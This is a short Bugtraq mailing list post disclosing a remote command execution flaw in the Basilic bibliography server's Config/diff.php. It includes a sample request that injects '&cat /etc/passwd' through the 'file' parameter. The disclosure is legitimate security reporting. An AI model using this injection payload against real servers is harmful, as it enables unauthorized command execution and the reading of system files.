Bugtraq mailing list archives
Basilic RCE bug
From: m.razavi777 () gmail com
Date: Sat, 30 Jun 2012 20:45:21 GMT
Hi Dear Sir Basilic is an Automated Bibliography Server for Research Publications Diffusion that use by many research center. there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server. sample: http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2 Regards M.Razavi
Current thread:
- Basilic RCE bug m . razavi777 (Jul 02)
- <Possible follow-ups>
- Re: Basilic RCE bug larry0 (Jul 06)